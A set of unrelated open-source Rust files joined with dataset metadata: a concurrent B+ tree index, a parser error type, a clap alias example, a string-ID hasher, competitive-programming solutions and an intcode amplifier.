[`TreeIndex`]. /// /// It internally scans all the leaf nodes, and therefore the time complexity is O(N). /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// assert!(treeindex.insert(key, 10).is_ok()); /// } /// /// assert_eq!(treeindex.len(), 16); /// ``` #[inline] pub fn len(&self) -> usize { let barrier = Barrier::new(); self.iter(&barrier).count() } /// Returns `true` if the [`TreeIndex`] is empty. /// /// It internally scans all the leaf nodes, and therefore the time complexity is O(N). /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.is_empty()); /// ``` #[inline] pub fn is_empty(&self) -> bool { self.len() == 0 } /// Returns the depth of the [`TreeIndex`]. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// let result = treeindex.insert(key, 10); /// assert!(result.is_ok()); /// } /// /// assert_eq!(treeindex.depth(), 1); /// ``` #[inline] pub fn depth(&self) -> usize { let barrier = Barrier::new(); self.root .load(Acquire, &barrier) .as_ref() .map_or(0, |root_ref| root_ref.depth(1, &barrier)) } /// Returns a [`Visitor`]. /// /// The returned [`Visitor`] starts scanning from the minimum key-value pair. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(treeindex.insert(2, 11).is_ok()); /// assert!(treeindex.insert(3, 13).is_ok()); /// /// let barrier = Barrier::new(); /// /// let mut visitor = treeindex.iter(&barrier); /// assert_eq!(visitor.next().unwrap(), (&1, &10)); /// assert_eq!(visitor.next().unwrap(), (&2, &11)); /// assert_eq!(visitor.next().unwrap(), (&3, &13)); /// assert!(visitor.next().is_none()); /// ``` #[inline] pub fn iter<'t, 'b>(&'t self, barrier: &'b Barrier) -> Visitor<'t, 'b, K, V> { Visitor::new(self, barrier) } /// Returns a [`Range`] that scans keys in the given range. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for i in 0..10 { /// assert!(treeindex.insert(i, 10).is_ok()); /// } /// /// let barrier = Barrier::new(); /// /// assert_eq!(treeindex.range(1..1, &barrier).count(), 0); /// assert_eq!(treeindex.range(4..8, &barrier).count(), 4); /// assert_eq!(treeindex.range(4..=8, &barrier).count(), 5); /// ``` #[inline] pub fn range<'t, 'b, R: RangeBounds<K>>( &'t self, range: R, barrier: &'b Barrier, ) -> Range<'t, 'b, K, V, R> { Range::new(self, range, barrier) } } impl<K, V> TreeIndex<K, V> where K: 'static + Clone + fmt::Display + Ord + Send + Sync, V: 'static + Clone + fmt::Display + Send + Sync, { /// Prints the [`TreeIndex`] contents to the given output in the DOT language. /// /// # Errors /// /// An [`io::Error`](std::io::Error) can be returned. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// /// treeindex.print(&mut std::io::stdout()); /// ``` pub fn print<T: std::io::Write>(&self, output: &mut T) -> std::io::Result<()> { output.write_fmt(format_args!("digraph {{\n"))?; let barrier = Barrier::new(); if let Some(root_ref) = self.root.load(Acquire, &barrier).as_ref() { root_ref.print(output, 1, &barrier)?; } output.write_fmt(format_args!("}}")) } } impl<K, V> Default for TreeIndex<K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { /// Creates a [`TreeIndex`] with the default parameters. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::default(); /// /// assert!(treeindex.read(&1, |_, v| *v).is_none()); /// ``` fn default() -> Self { TreeIndex::new() } } /// [`Visitor`] scans all the key-value pairs in the [`TreeIndex`]. /// /// It is guaranteed to visit all the key-value pairs that outlive the [`Visitor`], and it /// scans keys in monotonically increasing order. pub struct Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { tree: &'t TreeIndex<K, V>, leaf_scanner: Option<Scanner<'b, K, V>>, barrier: &'b Barrier, } impl<'t, 'b, K, V> Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { fn new(tree: &'t TreeIndex<K, V>, barrier: &'b Barrier) -> Visitor<'t, 'b, K, V> { Visitor::<'t, 'b, K, V> { tree, leaf_scanner: None, barrier, } } } impl<'t, 'b, K, V> Iterator for Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { type Item = (&'b K, &'b V); fn next(&mut self) -> Option<Self::Item> { // Starts scanning. if self.leaf_scanner.is_none() { loop { let root_ptr = self.tree.root.load(Acquire, self.barrier); if let Some(root_ref) = root_ptr.as_ref() { if let Ok(scanner) = root_ref.min(self.barrier) { self.leaf_scanner.replace(scanner); break; } } else { return None; } } } // Proceeds to the next entry. if let Some(mut scanner) = self.leaf_scanner.take() { let min_allowed_key = scanner.get().map(|(key, _)| key); if let Some(result) = scanner.next() { self.leaf_scanner.replace(scanner); return Some(result); } // Proceeds to the next leaf node. if let Some(new_scanner) = scanner.jump(min_allowed_key, self.barrier) { if let Some(entry) = new_scanner.get() { self.leaf_scanner.replace(new_scanner); return Some(entry); } } } None } } impl<'t, 'b, K, V> FusedIterator for Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { } /// [`Range`] represents a range of keys in the [`TreeIndex`]. /// /// It is identical to [`Visitor`] except that it does not traverse keys outside of the given /// range. pub struct Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: 'static + RangeBounds<K>, { tree: &'t TreeIndex<K, V>, leaf_scanner: Option<Scanner<'b, K, V>>, range: R, check_lower_bound: bool, check_upper_bound: bool, barrier: &'b Barrier, } impl<'t, 'b, K, V, R> Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { fn new(tree: &'t TreeIndex<K, V>, range: R, barrier: &'b Barrier) -> Range<'t, 'b, K, V, R> { Range::<'t, 'b, K, V, R> { tree, leaf_scanner: None, range, check_lower_bound: true, check_upper_bound: false, barrier, } } fn next_unbounded(&mut self) -> Option<(&'b K, &'b V)> { // Starts scanning. if self.leaf_scanner.is_none() { loop { let root_ptr = self.tree.root.load(Acquire, self.barrier); if let Some(root_ref) = root_ptr.as_ref() { let min_allowed_key = match self.range.start_bound() { Excluded(key) | Included(key) => Some(key), Unbounded => { self.check_lower_bound = false; None } }; if let Ok(leaf_scanner) = min_allowed_key.map_or_else( || root_ref.min(self.barrier), |min_allowed_key| root_ref.max_less(min_allowed_key, self.barrier), ) { self.check_upper_bound = match self.range.end_bound() { Excluded(key) => leaf_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) != Ordering::Less), Included(key) => leaf_scanner.max_entry().map_or(false, |max_entry| { max_entry.0.cmp(key) == Ordering::Greater }), Unbounded => false, }; self.leaf_scanner.replace(leaf_scanner); break; } } else { // Empty. return None; } } } // Proceeds to the next entry. if let Some(mut scanner) = self.leaf_scanner.take() { let min_allowed_key = scanner.get().map(|(key, _)| key); if let Some(result) = scanner.next() { self.leaf_scanner.replace(scanner); return Some(result); } // Proceeds to the next leaf node. if let Some(new_scanner) = scanner.jump(min_allowed_key, self.barrier).take() { if let Some(entry) = new_scanner.get() { self.check_upper_bound = match self.range.end_bound() { Excluded(key) => new_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) != Ordering::Less), Included(key) => new_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) == Ordering::Greater), Unbounded => false, }; self.leaf_scanner.replace(new_scanner); return Some(entry); } } } None } } impl<'t, 'b, K, V, R> Iterator for Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { type Item = (&'b K, &'b V); fn next(&mut self) -> Option<Self::Item> { while let Some((key_ref, value_ref)) = self.next_unbounded() { if self.check_lower_bound { match self.range.start_bound() { Excluded(key) => { if key_ref.cmp(key) != Ordering::Greater { continue; } } Included(key) => { if key_ref.cmp(key) == Ordering::Less { continue; } } Unbounded => (), } } self.check_lower_bound = false; if self.check_upper_bound { match self.range.end_bound() { Excluded(key) => { if key_ref.cmp(key) == Ordering::Less { return Some((key_ref, value_ref)); } } Included(key) => { if key_ref.cmp(key) != Ordering::Greater { return Some((key_ref, value_ref)); } } Unbounded => { return Some((key_ref, value_ref)); } } break; } return Some((key_ref, value_ref)); } None } } impl<'t, 'b, K, V, R> FusedIterator for Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { }
true
e2b95d034b5e7e1fdb3eed5fde0199ae11a86d91
Rust
xshade-lang/xshade-parser
/src/error/mod.rs
UTF-8
2,716
3.078125
3
[ "MIT" ]
permissive
use ::std::convert::From; use ::std::error::Error; use ::std::fmt; use ::ast::Span; pub type ParseResult<T> = Result<T, ParseError>; #[derive(Debug, Copy, Clone, Serialize, Deserialize)] pub enum ParseErrorKind { Unknown = 0, UnrecognizedCharacter = 1, InvalidTopLevelItem = 1000, InvalidStructName = 2000, InvalidFunctionName = 3000, MissingArgumentList = 3001, MissingOpenCurlyBraces = 5000, MissingClosingCurlyBraces = 5001, MissingError = 999999, } impl From<u32> for ParseErrorKind { fn from(value: u32) -> Self { match value { 1 => ParseErrorKind::UnrecognizedCharacter, 1000 => ParseErrorKind::InvalidTopLevelItem, 2000 => ParseErrorKind::InvalidStructName, 3000 => ParseErrorKind::InvalidFunctionName, 3001 => ParseErrorKind::MissingArgumentList, 5000 => ParseErrorKind::MissingOpenCurlyBraces, 5001 => ParseErrorKind::MissingClosingCurlyBraces, 999999 => ParseErrorKind::MissingError, _ => ParseErrorKind::Unknown, } } } #[derive(Debug, Serialize, Deserialize)] pub struct ParseError { span: Span, kind: ParseErrorKind, } impl ParseError { pub fn new(span: Span, kind: ParseErrorKind) -> ParseError { ParseError { span, kind, } } } impl Error for ParseError { fn description(&self) -> &str { "ParseError" } fn cause(&self) -> Option<&Error> { None } } impl fmt::Display for ParseError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self.kind { ParseErrorKind::Unknown => write!(f, "ParseError: Unknown error at {}.", self.span), ParseErrorKind::UnrecognizedCharacter => write!(f, "ParseError: Unrecognized character at {}.", self.span), ParseErrorKind::InvalidTopLevelItem => write!(f, "ParseError: Invalid top level item at {}.", self.span), ParseErrorKind::MissingOpenCurlyBraces => write!(f, "ParseError: Missing opening curly braces at {}.", self.span), ParseErrorKind::MissingClosingCurlyBraces => write!(f, "ParseError: Missing closing curly braces at {}.", self.span), ParseErrorKind::InvalidStructName => write!(f, "ParseError: Invalid struct name at {}.", self.span), ParseErrorKind::InvalidFunctionName => write!(f, "ParseError: Invalid function name at {}.", self.span), ParseErrorKind::MissingArgumentList => write!(f, "ParseError: Missing argument list at {}.", self.span), ParseErrorKind::MissingError => write!(f, "ParseError: A custom error is missing in a nom parser."), } } }
true
c31f410dd04fc3b4cd12b8cf48b6bee1ec617e67
Rust
poma/clap
/examples/21_aliases.rs
UTF-8
1,275
3.46875
3
[ "MIT", "Apache-2.0" ]
permissive
use clap::{App, Arg}; fn main() { let matches = App::new("MyApp") .subcommand( App::new("ls") .aliases(&["list", "dir"]) .about("Adds files to myapp") .version("0.1") .author("Kevin K.") .arg( Arg::with_name("input") .help("the file to add") .index(1) .required(true), ), ) .get_matches(); // You can check if a subcommand was used like normal if matches.is_present("add") { println!("'myapp add' was run."); } // You can get the independent subcommand matches (which function exactly like App matches) if let Some(ref matches) = matches.subcommand_matches("add") { // Safe to use unwrap() because of the required() option println!("Adding file: {}", matches.value_of("input").unwrap()); } // You can also match on a subcommand's name match matches.subcommand_name() { Some("add") => println!("'myapp add' was used"), None => println!("No subcommand was used"), _ => println!("Some other subcommand was used"), } // Continued program logic goes here... }
true
7aa8ff12d2bbaeb9e6549f26947122160c5c4542
Rust
silverweed/ecsde
/inle/inle_common/src/stringid.rs
UTF-8
4,414
2.890625
3
[]
no_license
use std::convert::From; #[cfg(debug_assertions)] use {std::collections::hash_map::Entry, std::collections::HashMap, std::sync::RwLock}; #[derive(PartialEq, Hash, Copy, Clone, PartialOrd, Eq, Ord)] pub struct String_Id(u32); #[cfg(debug_assertions)] lazy_static! { static ref STRING_ID_MAP: RwLock<HashMap<String_Id, String>> = RwLock::new(HashMap::new()); } impl String_Id { pub const fn from_u32(x: u32) -> String_Id { String_Id(x) } pub const fn val(self) -> u32 { self.0 } } impl<'a, T> From<T> for String_Id where &'a str: From<T>, T: 'a, { fn from(s: T) -> String_Id { trace!("String_Id::from"); let s: &str = s.into(); sid_from_str(s) } } #[cfg(debug_assertions)] pub fn sid_from_str(s: &str) -> String_Id { let this = const_sid_from_str(s); { match STRING_ID_MAP .write() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .entry(this) { Entry::Occupied(o) => { let old = o.get().as_str(); assert_eq!( old, s, "Two strings map to the same SID: {} and {}!", old, s ); } Entry::Vacant(v) => { v.insert(String::from(s)); } } } this } #[cfg(not(debug_assertions))] pub const fn sid_from_str(s: &str) -> String_Id { const_sid_from_str(s) } pub const fn const_sid_from_str(s: &str) -> String_Id { String_Id(fnv1a(s.as_bytes())) } #[macro_export] macro_rules! sid { ($str: expr) => { $crate::stringid::sid_from_str($str) }; } impl std::fmt::Display for String_Id { #[cfg(not(debug_assertions))] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } #[cfg(debug_assertions)] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "{}", STRING_ID_MAP .read() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .get(self) // this may fail if we created the String_Id from an integer directly .unwrap_or(&format!("{}", self.0)) ) } } impl std::fmt::Debug for String_Id { #[cfg(not(debug_assertions))] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "String_Id({})", self.0) } #[cfg(debug_assertions)] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "String_Id({}, \"{}\")", self.0, STRING_ID_MAP .read() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .get(self) .map_or("??", |s| s) ) } } pub const FNV1A_PRIME32: u32 = 16_777_619; pub const FNV1A_START32: u32 = 2_166_136_261; const fn fnv1a(bytes: &[u8]) -> u32 { let mut result = FNV1A_START32; let mut i = 0; while i < bytes.len() { let b = bytes[i]; result ^= b as u32; result = result.wrapping_mul(FNV1A_PRIME32); i += 1; } result } #[cfg(test)] mod tests { use super::*; #[test] fn test_fnv1a() { const_assert!(fnv1a(b"A test string") == 943117577); assert_eq!(fnv1a(b"A test string"), 0x3836d509); assert_eq!(fnv1a(b"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor \ incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud \ exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure \ dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. \ Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \ mollit anim id est laborum."), 0x7c0594dd); } #[test] fn stringid_from_str() { assert_eq!(sid!("A test string"), String_Id(943117577)); assert_eq!(sid!("A test string").0, fnv1a(b"A test string")); } #[test] fn stringid_to_str() { assert_eq!( sid!("Another test string").to_string(), String::from("Another test string") ); } }
true
503011710ba89eeb2667fe15bc2a8d243b957ea7
Rust
binh-vu/semantic-modeling
/gmtk/src/graph_models/domains/int_domain.rs
UTF-8
753
3.125
3
[ "MIT" ]
permissive
use graph_models::traits::Domain; pub struct IntDomain { min: i32, max: i32, } impl IntDomain { pub fn new(min: i32, max: i32) -> IntDomain { return IntDomain { min, max } } } impl Domain for IntDomain { type Value = i32; fn numel(&self) -> usize { (self.max - self.min + 1) as usize } fn get_index(&self, &value: &<Self as Domain>::Value) -> usize { assert!(self.min <= value && value <= self.max, format!("Invalid value: {} <= {} <= {}", self.min, value, self.max)); return (value - self.min) as usize; } fn get_value(&self, index: usize) -> <Self as Domain>::Value { assert!(index <= (self.max - self.min) as usize); return self.min + index as i32; } }
true
04dcb28bec7efb17dce54e7e2e8338cf16e3854f
Rust
shirvan/fastlyzer
/src/rw.rs
UTF-8
1,222
2.984375
3
[ "Unlicense", "MIT" ]
permissive
use crate::FastResult; use concat_reader::concat_path; use std::{ fs::OpenOptions, io::{BufRead, BufReader}, path::Path, }; /// Main input interface. /// /// We wanted to allow users to read a directory or a file without having to choose a different /// flag for each. This way users don't have to remember multiple flags and if they make a mistake /// it's easy to adjust the target, for example by adding an extension. /// /// This function uses the (concat_reader)[https://docs.rs/concat-reader/0.1.0/concat_reader/] crate /// to read all the files in a directory into one buffer. pub fn reader(file: &str) -> FastResult<Box<dyn BufRead>> { let path = Path::new(file); if path.is_dir() { let paths = path .read_dir() .into_iter() .map(|file| file.map(|f| f.unwrap().path()).collect::<Vec<_>>()) .flatten() .filter(|path| path.is_file()) .collect::<Vec<_>>(); let file = concat_path(paths); let buff = BufReader::new(file); Ok(Box::new(buff)) } else { let file = OpenOptions::new().read(true).open(&path)?; let buff = BufReader::new(file); Ok(Box::new(buff)) } }
true
428544c71a467fbe5581fed8c53c6981a3ba8128
Rust
y-oksaku/Competitive-Programming
/AtCoder/abc/161e_2.rs
UTF-8
1,179
2.546875
3
[]
no_license
#![allow(unused_imports)] #![allow(unused_macros)] #![allow(non_snake_case)] #![allow(dead_code)] #![allow(unused_variables)] #![allow(unused_mut)] #![allow(unused_assignments)] use proconio::input; use proconio::marker::*; use std::collections::*; use std::cmp::*; use std::mem::swap; use std::f64::consts::*; const MOD: u64 = 1000000007; const INF: usize = std::usize::MAX / 4; fn main() { input! { N: usize, K: usize, C: usize, S: Chars, } let mut L = vec![0; N + 1]; let mut R = vec![0; N + 1]; let mut now = 1; while now <= N { if S[now - 1] == 'o' { L[now] += 1; now += C + 1; } else { now += 1; } } for i in 0..N { L[i + 1] += L[i]; } now = 1; while now <= N { if S[N - now] == 'o' { R[N - now] += 1; now += C + 1; } else { now += 1; } } for i in (0..N).rev() { R[i] += R[i + 1]; } for i in 1..N+1 { if S[i - 1] == 'o' && L[i] + R[i] == K && L[i] != L[i - 1] && R[i] != R[i - 1] { println!("{}", i); } } }
true
edb48e1fe69724e183e47937500776ca2a60795e
Rust
mgw854/adventofcode2019
/src/day7/mod.rs
UTF-8
8,747
2.78125
3
[]
no_license
use super::intcode_8086::{Intcode8086}; use bus::BusReader; pub struct Amplifier { processor: Intcode8086, pub output: BusReader<i32> } impl Amplifier { pub fn create(phase_setting: u8, input_signal: i32, mut cpu: Intcode8086, mut input: BusReader<i32>) -> Amplifier { let cpu_input : crossbeam_channel::Sender<i32> = cpu.get_input_port(); cpu_input.send(phase_setting as i32).expect("Sending a phase signal should not fail"); cpu_input.send(input_signal).expect("Sending an input signal should not fail"); std::thread::spawn(move || { loop { match input.recv() { Ok(x) => match cpu_input.send(x) { Err(e) => break, _ => continue }, Err(e) => { break; } }; } }); let output = cpu.get_output_port(); Amplifier { processor: cpu, output: output } } pub fn create_no_value(phase_setting: u8, mut cpu: Intcode8086, mut input: BusReader<i32>) -> Amplifier { let cpu_input : crossbeam_channel::Sender<i32> = cpu.get_input_port(); cpu_input.send(phase_setting as i32).expect("Sending a phase signal should not fail"); std::thread::spawn(move || { loop { match input.recv() { Ok(x) => cpu_input.send(x).expect("Send shouldn't fail (nv)"), Err(e) => { break; } }; } }); let output = cpu.get_output_port(); Amplifier { processor: cpu, output: output } } } pub fn phase_setting_generator() -> Vec<Vec<u8>> { let mut results = Vec::new(); for i in 5..=9 { for j in 5..=9 { if i == j { continue; } for k in 5..=9 { if i == k || j == k { continue; } for l in 5..=9 { if i == l || j == l || k == l { continue; } for m in 5..=9 { if i == m || j == m || k == m || l == m { continue; } results.push(vec![i, j, k, l, m]); } } } } } results } impl Amplifier { pub fn run(self) -> std::thread::JoinHandle<Intcode8086> { self.processor.process() } } #[cfg(test)] mod tests { use super::*; fn parse_csv(input: &str) -> Vec<i32> { input .split(",") .map(|s| s.trim()) .map(|s| s.parse::<i32>().unwrap()) .collect() } #[test] fn given_input_part1_1() { let instructions = "3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(4, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(3, cpu1, io0); let amp2 = Amplifier::create_no_value(2, cpu2, io1); let amp3 = Amplifier::create_no_value(1, cpu3, io2); let amp4 = Amplifier::create_no_value(0, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 43210); } #[test] fn given_input_part1_2() { let instructions = "3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(0, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(1, cpu1, io0); let amp2 = Amplifier::create_no_value(2, cpu2, io1); let amp3 = Amplifier::create_no_value(3, cpu3, io2); let amp4 = Amplifier::create_no_value(4, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 54321); } #[test] fn given_input_part1_3() { let instructions = "3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(1, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(0, cpu1, io0); let amp2 = Amplifier::create_no_value(4, cpu2, io1); let amp3 = Amplifier::create_no_value(3, cpu3, io2); let amp4 = Amplifier::create_no_value(2, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 65210); } #[test] fn given_input_part2_1() { let instructions = "3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(9, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(8, cpu1, io0); let amp2 = Amplifier::create_no_value(7, cpu2, io1); let amp3 = Amplifier::create_no_value(6, cpu3, io2); let amp4 = Amplifier::create_no_value(5, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 139629729); } #[test] fn given_input_part2_2() { let instructions = "3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(9, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(7, cpu1, io0); let amp2 = Amplifier::create_no_value(8, cpu2, io1); let amp3 = Amplifier::create_no_value(5, cpu3, io2); let amp4 = Amplifier::create_no_value(6, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 18216); } }
true
ba0fed58c21409a8a0acb8a7117b811facb6a182
Rust
zeroDivisible/advent-of-code
/2019/day_02/src/main.rs
UTF-8
3,261
3.609375
4
[]
no_license
use std::{ fs::File, io::{prelude::*, BufReader}, path::Path, }; fn lines_from_file(filename: impl AsRef<Path>) -> Vec<String> { let file = File::open(filename).expect("no such file"); let buf = BufReader::new(file); buf.lines() .map(|l| l.expect("Could not parse line")) .collect() } fn execute_one(input: &mut Vec<i32>, register: usize) -> bool { let opcode = input[register]; if opcode == 99 { return false } let arg1 = input[input[register + 1] as usize]; let arg2 = input[input[register + 2] as usize]; let outindex = input[register + 3] as usize; match opcode { 1 => { input[outindex] = arg1 + arg2; return true } 2 => { input[outindex] = arg1 * arg2; return true } _ => { panic!("invalid opcode") } } } fn execute_all(input: &mut Vec<i32>, register: usize) -> () { let mut index = register; let done = false; while !done { let finished = execute_one(input, index); if !finished { break } index += 4 } } fn prepare_input(input: &Vec<String>) -> Vec<i32> { let line = input.first().unwrap(); line .split(",") .map(|s| s.to_string().parse::<i32>().unwrap()) .collect() } fn part_01(input: &Vec<String>) -> () { let mut parsed = prepare_input(input); parsed[1] = 12; parsed[2] = 2; execute_all(&mut parsed, 0); dbg!(parsed[0]); } fn part_02(input: &Vec<String>) -> () { let parsed = prepare_input(input); for noun in 0..99 { for verb in 0..99 { let mut program = parsed.clone(); program[1] = noun; program[2] = verb; execute_all(&mut program, 0); if program[0] == 19690720 { println!("noun = {}, verb = {}", noun, verb); println!("result = {}", 100 * noun + verb); break; } } } } fn main() { let input = lines_from_file("input/input.txt"); part_01(&input); part_02(&input); } #[cfg(test)] mod tests { use super::*; #[test] fn it_prepares_input() { let input = vec!["1,2,3,4,5".to_string()]; assert_eq!(prepare_input(&input), vec![1,2,3,4,5]); } #[test] fn it_executes_one_iteration() { let mut input = vec![1,0,0,0,99]; execute_one(&mut input, 0); assert_eq!(input, vec![2,0,0,0,99]); let mut input = vec![2,3,0,3,99]; execute_one(&mut input, 0); assert_eq!(input, vec![2,3,0,6,99]); let mut input = vec![2,4,4,5,99,0]; execute_one(&mut input, 0); assert_eq!(input, vec![2,4,4,5,99,9801]); let mut input = vec![1,1,1,4,99,5,6,0,99]; execute_one(&mut input, 0); execute_one(&mut input, 4); let return_value = execute_one(&mut input, 8); assert_eq!(input, vec![30,1,1,4,2,5,6,0,99]); assert_eq!(return_value, false); } #[test] fn it_executes_all() { let mut input = vec![1,1,1,4,99,5,6,0,99]; execute_all(&mut input, 0); assert_eq!(input, vec![30,1,1,4,2,5,6,0,99]); } }
true
0e03be4fc969966944526400efc9ef1f06ccd276
Rust
duchainer/sea-query
/src/backend/postgres/types.rs
UTF-8
1,879
2.890625
3
[ "Apache-2.0", "MIT" ]
permissive
